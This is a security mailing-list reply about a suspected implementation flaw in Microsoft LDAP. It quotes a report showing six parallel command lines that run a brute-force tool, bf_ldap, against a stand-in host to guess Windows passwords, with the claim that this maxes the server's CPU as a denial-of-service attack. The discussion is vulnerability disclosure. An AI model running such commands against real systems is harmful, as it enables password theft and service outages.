Re: implementation problem in Microsoft LDAP?

["M.Grootveld" <M.Grootveld () ITsec nl>]

Hi

Sardañons, Eliel wrote:

> <snip>

> Problem 2:
>
> Another problem I have seen is that when I use my brute force program
> (brute_force_ldap) to try to guess a Windows password and I run 5 or more
> instance of my program at the same time like this:
>
> ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_1 -l 8 &
> ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_2 -l 8 &
> ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_3 -l 8 &
> ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_4 -l 8 &
> ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_5 -l 8 &
> ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_6 -l 8 &
>
> the CPU usage in www.victim.com is at 100%!!! And the console is unusable in
> the windows box. I try this using a none_existent_user and an existent_user
> and it consumes more resources with non existent users.
>
> So an attacker can use my program as a Distributed Denial Of service Attack
> (ddos) running it from different machines at the same time with a unique
> target. (www.victim.com).

Could you provide any additional details about your exploit code and the
configuration you are using. With the information you provided I can't tell if
the second problem is caused by an implementation problem or that the LDAP
service is perhaps configured incorrectly.

Greetings

M. Grootveld